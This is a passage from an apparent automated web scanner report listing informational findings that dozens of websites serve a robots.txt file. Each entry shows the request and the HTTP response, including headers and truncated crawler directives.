Connection: close
Set-Cookie: Tagalongs=d6OlH7K5vjkg1aaNvdrCAAyuQhFbkWMawXqQARTea2ncgYe50lgkvgvlLdjyxGhS5XLGxvCt6iw81w==; path=/

User-agent: *
Disallow:
Sitemap: http://www.girlscoutshop.com/gsusaonline/sitemapindex.xml

30.195. http://www.globelifeapplication.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.globelifeapplication.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.globelifeapplication.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:44:49 GMT
Server: Apache/2.2.14 (Ubuntu)
Set-Cookie: Apache=173.193.214.243.1304293489161145; path=/; expires=Mon, 27-Apr-26 23:44:49 GMT
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Vary: Accept-Encoding
Content-Length: 88
Connection: close
Content-Type: text/html

# /robots.txt file for http://www.globelifeapplication.com/

User-agent: *
Disallow: /

30.196. http://www.gocrimson.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gocrimson.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gocrimson.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:33:13 GMT
Server: Resin/3.0.18
ETag: "FHA+QzSmsjB"
Last-Modified: Wed, 09 Jun 2010 19:14:17 GMT
Content-Type: text/plain
Content-Length: 445
Connection: close

# Managed by PrestoSports sysadmin@prestosports.com
User-agent: american-univ-crawler (Enterprise; S5-DWRRJ5KWB2NAA; nguyen@american.edu)
Disallow: /

User-agent: CSTV Search Crawler
Disallow: /

User
...[SNIP]...

30.197. http://www.gohawaii.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gohawaii.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gohawaii.com

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=XKQRVMS192.168.10.48CKMLW; path=/
Date: Sun, 01 May 2011 23:51:23 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Thu, 28 Apr 2011 18:54:59 GMT
ETag: "67c-4a1ff180bc6c0"
Accept-Ranges: bytes
Content-Length: 1660
Cache-Control: max-age=604800
Expires: Sun, 08 May 2011 23:51:23 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /directory/search
Disallow: /big-island/search
Disallow: /statewide/search
Disallow: /oahu/search
Disallow: /lanai/search
Disallow: /maui/search
Disallow: /molokai/searc
...[SNIP]...

30.198. http://www.goldpassport.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.goldpassport.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.goldpassport.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 08 Dec 2010 09:13:08 GMT
Content-Type: text/plain; charset=ISO-8859-1
Expires: Mon, 02 May 2011 00:44:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 02 May 2011 00:44:00 GMT
Content-Length: 7258
Connection: close
Set-Cookie: NSC_xxx.izbuu.dpn_80=9fd41b483660;expires=Mon, 02-May-11 01:14:00 GMT;path=/

User-agent: *
Disallow: /cet/
Disallow: /hyatt/reservations/
Disallow: /hyatt/pure/locator/
Disallow: /*?NE
Disallow: /hyatt/features/hotel-search-results.jsp
Disallow: /hyatt/search/specials/re
...[SNIP]...

30.199. http://www.goodtoknow.co.uk/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.goodtoknow.co.uk
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.goodtoknow.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 14 Apr 2011 08:28:48 GMT
ETag: "601aa6-24a-4a0dcb6dc9000"
Accept-Ranges: bytes
Content-Length: 586
Content-Type: text/plain
Date: Mon, 02 May 2011 00:18:21 GMT
Connection: close
Set-Cookie: browsertype=web; expires=Tue, 03-May-2011 00:18:21 GMT; path=/; domain=.goodtoknow.co.uk

# robots.txt file for goodtoknow.co.uk

Sitemap: http://www.goodtoknow.co.uk/sitemaps/sitemap-index.xml

User-agent: *
Disallow: /bookmark
Disallow: /articles/sendToFriend/
Disallow: /privacy
Disallow
...[SNIP]...

30.200. http://www.google-analytics.com/__utm.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google-analytics.com
Path:   /__utm.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google-analytics.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 10 Jan 2011 11:53:04 GMT
Date: Mon, 02 May 2011 01:53:18 GMT
Expires: Mon, 02 May 2011 01:53:18 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /siteopt.js
Disallow: /config.js

30.201. http://www.gov-auctions.org/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gov-auctions.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gov-auctions.org

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:55:18 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sun, 10 Aug 2008 16:03:00 GMT
ETag: "2041a001-23-4541d2c3fb500"
Accept-Ranges: bytes
Content-Length: 35
Connection: close
Content-Type: text/plain


User-agent: *
Disallow: /cgi-bin/

30.202. http://www.grannarium.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.grannarium.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.grannarium.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:14:51 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.6 mod_ssl/2.8.31 OpenSSL/0.9.8c
Last-Modified: Sun, 18 Jul 2010 06:53:27 GMT
ETag: "32b4059-68-4c42a4e7"
Accept-Ranges: bytes
Content-Length: 104
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /porn/
Disallow: /image/
Disallow: /style/
Disallow: /crtr/

30.203. http://www.greenbuildingadvisor.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.greenbuildingadvisor.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.greenbuildingadvisor.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:20:30 GMT
Server: Apache
Last-Modified: Sat, 17 Jan 2009 17:21:52 GMT
Accept-Ranges: bytes
Content-Length: 1590
Cache-Control: max-age=1209600
Expires: Mon, 16 May 2011 00:20:30 GMT
Connection: close
Content-Type: text/plain

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

30.204. http://www.greensmoke.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.greensmoke.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.greensmoke.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:14:01 GMT
Server: Apache
Last-Modified: Tue, 28 Dec 2010 09:23:27 GMT
ETag: "17b0003-96-49875014901c0"
Accept-Ranges: bytes
Content-Length: 150
Cache-Control: max-age=315360000
Expires: Wed, 28 Apr 2021 23:14:01 GMT
P3P: CP="CURi CONi OUR IND PUR NAV DSP ALL COR"
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /livehelp/
Disallow: /support/
Disallow: /support2/
Disallow: /discuss/
Disallow: /test/
Disallow: /services/
Disallow: /earn/

30.205. http://www.guitarnoise.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.guitarnoise.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.guitarnoise.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:48:28 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9
Last-Modified: Sat, 16 Jan 2010 00:54:06 GMT
ETag: "5e0010-14e-47d3d8e9d6780"
Accept-Ranges: bytes
Content-Length: 334
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /forums/viewtopic.php?p=
Disallow: /forums/viewtopic.php?=&p=
Disallow: /forums/viewtopic.php?t=
Disallow: /forums/viewtopic.php?start=
Disallow: /forums/*&view=previous

...[SNIP]...

30.206. http://www.gwawa.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gwawa.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gwawa.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 22 Apr 2011 07:37:35 GMT
Accept-Ranges: bytes
ETag: "dd62e625c00cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:58:27 GMT
Connection: close
Content-Length: 27

User-agent: *
Allow: /


30.207. http://www.hairyfilm.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hairyfilm.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hairyfilm.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 01 May 2011 23:45:13 GMT
Content-Type: text/plain
Connection: close
Last-Modified: Thu, 22 Jul 2010 19:11:40 GMT
ETag: "28f10-5d-4c4897ec"
Accept-Ranges: bytes
Content-Length: 93

User-agent: *
Disallow: /?x=
Allow: /movies/
Sitemap: http://www.hairyfilm.com/sitemap.xml

30.208. http://www.hairysupreme.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hairysupreme.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hairysupreme.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:14:37 GMT
Server: Apache
Last-Modified: Sun, 13 Dec 2009 22:11:13 GMT
ETag: "e9a17d-18-4b256681"
Accept-Ranges: bytes
Content-Length: 24
Connection: close
Content-Type: text/plain

User-agent: *
Allow: /


30.209. http://www.halfpriceozarks.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.halfpriceozarks.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.halfpriceozarks.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:55:07 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 25 Aug 2010 15:52:30 GMT
ETag: "14600d7-6f-48ea7de790b80"
Accept-Ranges: bytes
Content-Length: 111
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /discuss
Disallow: /email
Disallow: /inc
Disallow: /sms
Disallow: side-deal2.php

30.210. http://www.hannaandersson.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hannaandersson.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hannaandersson.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 17 Aug 2010 19:06:32 GMT
Accept-Ranges: bytes
ETag: "78a9ef4d3f3ecb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:52:34 GMT
Connection: keep-alive
Content-Length: 279

User-agent: *
Disallow: /App_Code
Disallow: /Bin
Disallow: /Config
Disallow: /coremetrics
Disallow: /foresee
Disallow: /html
Disallow: /HtmlEmails
Disallow: /images
Disallow: /include
Disall
...[SNIP]...

30.211. http://www.harlandclarke.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.harlandclarke.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.harlandclarke.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:49:31 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Thu, 31 Mar 2011 20:29:19 GMT
Accept-Ranges: bytes
Content-Length: 281
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

# robots.txt - standard configuration
User-agent: *
Disallow: /about/people/
Disallow: /solutions/partnersite
Disallow: /solutions/partner-site
Disallow: /admin/
Disallow: /files/
Disallow: /_images/

...[SNIP]...

30.212. http://www.hauteliving.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hauteliving.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hauteliving.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:55:41 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 26 Apr 2010 21:01:43 GMT
ETag: "e080ff-1c2-4852a1584fbc0"
Accept-Ranges: bytes
Content-Length: 450
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /z/
Disallow: /stats/
Disallow: /wp-admin/
Disallow: /wp-includes/
Disallow: /contact/
Disallow: /category/
Disallow: /tag/
Disallow: /wp-content/plugins/
D
...[SNIP]...

30.213. http://www.headsets.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.headsets.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.headsets.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:42:49 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 208
Connection: close
Content-Type: text/html; charset=ISO-8859-1

User-agent: Googlebot
Disallow: /cgi/
Disallow: /cart/
Disallow: /acc_mgt/
Disallow: /manage/
Disallow: /*?
Disallow: /?

User-agent: *
Disallow: /cgi/
Disallow: /cart/
Disallow: /acc_mgt/
Disallow: /
...[SNIP]...

30.214. http://www.healthination.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.healthination.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.healthination.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Sun, 01 May 2011 23:56:04 GMT
Content-Type: text/plain; charset=UTF-8
Connection: close
Last-Modified: Tue, 08 Mar 2011 15:16:56 GMT
Content-Length: 357
Cache-Control: max-age=4200
Expires: Mon, 02 May 2011 01:06:04 GMT
Accept-Ranges: bytes

User-agent: *
Crawl-delay: 30
Disallow: /Girl-Talk/Girl-Talk/
Disallow: /Girl-Talk/Girl-Talk
Disallow: /Partner-With-Us/Part
Disallow: /Partner-With-Us/Internet-Partners
Disallow: /demos/
Disal
...[SNIP]...

30.215. http://www.healthykids.org/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.healthykids.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.healthykids.org

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:42:46 GMT
Server: Apache/2.2.2 (FreeBSD) mod_ssl/2.2.2 OpenSSL/0.9.8b
Last-Modified: Tue, 04 Jul 2006 19:05:03 GMT
ETag: "472d2e-43-312f75c0"
Accept-Ranges: bytes
Content-Length: 67
Connection: close
Content-Type: text/plain

User-agent:    *
Disallow:    /cgi-bin
Disallow:    /stats
Disallow:    /admin

30.216. http://www.heartlandconnection.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.heartlandconnection.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.heartlandconnection.com

Response

HTTP/1.0 200 OK
Content-Length: 595
Content-Type: text/plain
Content-Location: http://www.heartlandconnection.com/robots.txt
Last-Modified: Wed, 10 Dec 2008 17:34:43 GMT
Accept-Ranges: bytes
ETag: "431e6b96ed5ac91:1190"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Mon, 02 May 2011 00:51:08 GMT
Connection: close

User-agent: *
Disallow: /cms/
User-agent: *
Disallow: /includes/
User-agent: *
Disallow: /styles/
User-agent: *
Disallow: /xmlfiles/
User-agent: *
Disallow: /workarea/
User-agent: *
Disallo
...[SNIP]...

30.217. http://www.heartspring.net/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.heartspring.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.heartspring.net

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:30:28 GMT
Server: Apache/2.2.15 (Unix) PHP/5.2.6 with Suhosin-Patch mod_ssl/2.2.15 OpenSSL/1.0.0d
Last-Modified: Tue, 24 Nov 2009 07:02:02 GMT
ETag: "90f3c7-17-4791884db8e80"
Accept-Ranges: bytes
Content-Length: 23
Connection: close
Content-Type: text/plain

User-agent: *
Allow: /

30.218. http://www.hellobc.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hellobc.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hellobc.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Sun, 13 Feb 2011 18:43:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:48:29 GMT
Content-Length: 1096
Connection: close

#
# robots.txt for TBCCW/TBCDMS
#
# $Id: robots.txt,v 1.22 2003/01/14 20:23:04 ted Exp $
#

# exclude some access-controlled areas
User-agent: *
Disallow: /TBCCW/AuthFiles
Disallow: /TBCCW/Us
...[SNIP]...

30.219. http://www.hematologylibrary.org/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hematologylibrary.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hematologylibrary.org

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:47:59 GMT
Server: Apache/1.3.26 (Unix) DAV/1.0.3 ApacheJServ/1.1.2
Last-Modified: Fri, 04 Jun 2010 21:11:04 GMT
ETag: "1f-4a5-4c096be8"
Accept-Ranges: bytes
Content-Length: 1189
Connection: close
Content-Type: text/plain

User-agent: *
Crawl-Delay: 10
Disallow: /accesslogs/
Disallow: /ads/
Disallow: /all.shtml
Disallow: /apps/
Disallow: /archive/
Disallow: /backtocs/
Disallow: /bmj/
Disallow: /browse-alt.shtml
Disallow
...[SNIP]...

30.220. http://www.herematures.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.herematures.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.herematures.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.1
Date: Sun, 01 May 2011 23:02:29 GMT
Content-Type: text/plain
Connection: close
Last-Modified: Mon, 19 Jul 2010 13:20:13 GMT
ETag: "d114eb-51-4c44510d"
Accept-Ranges: bytes
Content-Length: 81

User-agent: *
Disallow: /gal.cgi
Sitemap: http://www.herematures.com/sitemap.xml

30.221. http://www.heresquirt.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.heresquirt.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.heresquirt.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.20
Date: Sun, 01 May 2011 23:48:08 GMT
Content-Type: text/plain
Connection: close
Last-Modified: Fri, 20 Nov 2009 12:43:21 GMT
ETag: "1cc809a-50-4b068ee9"
Accept-Ranges: bytes
Content-Length: 80

User-agent: *
Disallow: /gal.cgi
Sitemap: http://www.heresquirt.com/sitemap.xml

30.222. http://www.herestuds.tv/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.herestuds.tv
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.herestuds.tv

Response

HTTP/1.1 200 OK
Server: nginx/0.8.20
Date: Mon, 02 May 2011 00:13:04 GMT
Content-Type: text/plain
Connection: close
Last-Modified: Wed, 18 Nov 2009 12:15:40 GMT
ETag: "1498087-4e-4b03e56c"
Accept-Ranges: bytes
Content-Length: 78

User-agent: *
Disallow: /gal.cgi
Sitemap: http://www.herestuds.tv/sitemap.xml

30.223. http://www.herpesonline.org/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.herpesonline.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.herpesonline.org

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:30:51 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 14 Aug 2008 00:00:00 GMT
ETag: "1048cdcb-45-454602fa86000"
Accept-Ranges: bytes
Content-Length: 69
Connection: close
Content-Type: text/plain

User-agent: Mediapartners-Google*
Disallow:
User-agent: *
Disallow:

30.224. http://www.hiddengalleries.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hiddengalleries.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hiddengalleries.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sun, 01 May 2011 23:11:49 GMT
Content-Type: text/plain
Connection: close
Last-Modified: Tue, 17 Jun 2008 18:01:50 GMT
ETag: "290023-26-44fe089cc9f80"
Accept-Ranges: bytes
Content-Length: 38

User-agent: *
Disallow: /cgi-bin/

30.225. http://www.highcharts.com/highslide/graphics/zoomout.cur

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.highcharts.com
Path:   /highslide/graphics/zoomout.cur

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.highcharts.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:48:46 GMT
Server: Apache/2.2.16
Last-Modified: Tue, 10 Nov 2009 17:20:37 GMT
ETag: "a9c5de3-130-47807874e4340"
Accept-Ranges: bytes
Content-Length: 304
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...

30.226. http://www.highspeedinternet.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.highspeedinternet.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.highspeedinternet.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:29:53 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.3.5
Last-Modified: Mon, 11 Apr 2011 22:15:01 GMT
Accept-Ranges: bytes
Content-Length: 1841
Cache-Control: max-age=2592000
Expires: Tue, 31 May 2011 23:29:53 GMT
Connection: close
Content-Type: text/plain; charset=utf-8

# $Id: robots.txt,v 1.9.2.2 2010/09/06 10:37:16 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

30.227. http://www.hittracker.org/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hittracker.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hittracker.org

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:15:32 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15
Last-Modified: Sat, 31 Oct 2009 10:41:14 GMT
ETag: "a8015cca-1c8-47738c8962680"
Accept-Ranges: bytes
Content-Length: 456
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Allow: /
Disallow: /cgi-bin/
Disallow: /wp-admin/
Disallow: /wp-includes/
Disallow: /wp-content/plugins/
Disallow: /wp-content/cache/
Disallow: /wp-content/themes/
Disallow: /trackback/

...[SNIP]...

30.228. http://www.hlsm.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hlsm.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hlsm.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:10:48 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Thu, 12 Jan 2006 13:20:25 GMT
ETag: "9050f5f27a17c61:dc0"
Content-Length: 26

User-agent: *
Disallow: /

30.229. http://www.homebusinessconnection.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.homebusinessconnection.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.homebusinessconnection.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/plain; charset=UTF-8
Date: Sun, 01 May 2011 23:16:26 GMT
Accept-Ranges: bytes
Connection: close
Set-Cookie: X-Mapping-nbjnphkm=8C4A8A5DCD99746FDA7F7D45EB9E4183; path=/
Last-Modified: Fri, 09 Jul 2010 19:20:49 GMT
Content-Length: 23

User-agent: *
Allow: /

30.230. http://www.hot18teens.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hot18teens.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hot18teens.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 02 May 2011 00:09:16 GMT
Content-Type: text/plain
Content-Length: 36
Last-Modified: Sun, 16 Jan 2011 19:08:55 GMT
Connection: close
Accept-Ranges: bytes

User-agent: Baiduspider
Disallow: /

30.231. http://www.hotelgrandpacific.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotelgrandpacific.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hotelgrandpacific.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:01:48 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.10 mod_ssl/2.8.31 OpenSSL/0.9.8g
Cache-Control: max-age=1209600
Expires: Sun, 15 May 2011 23:01:48 GMT
Last-Modified: Fri, 07 Jan 2011 23:50:40 GMT
ETag: "9f2154-637-4d27a6d0"
Accept-Ranges: bytes
Content-Length: 1591
Connection: close
Content-Type: text/plain

# $Id: robots.txt,v 1.7.2.3 2008/12/10 20:24:38 drumm Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by site
...[SNIP]...

30.232. http://www.hotspotshield.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotspotshield.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hotspotshield.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:11:50 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 07 Sep 2010 22:04:26 GMT
ETag: "1d00290-37-48fb2948c0e80"
Accept-Ranges: bytes
Content-Length: 55
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /hotspot-shield-download.php

30.233. http://www.howitshouldhaveended.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.howitshouldhaveended.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.howitshouldhaveended.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Mon, 30 Aug 2010 14:05:50 GMT
ETag: "505660-637-48f0af635ab80"
Accept-Ranges: bytes
Content-Length: 1591
Content-Type: text/plain
Date: Mon, 02 May 2011 00:09:25 GMT
Connection: close

# $Id: robots.txt,v 1.7.2.3 2008/12/10 20:24:38 drumm Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by site
...[SNIP]...

30.234. http://www.hudhouses.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hudhouses.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hudhouses.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:55:34 GMT
Server: Apache
Content-Language: en-US
P3P: CP="OTI DSP COR NID"
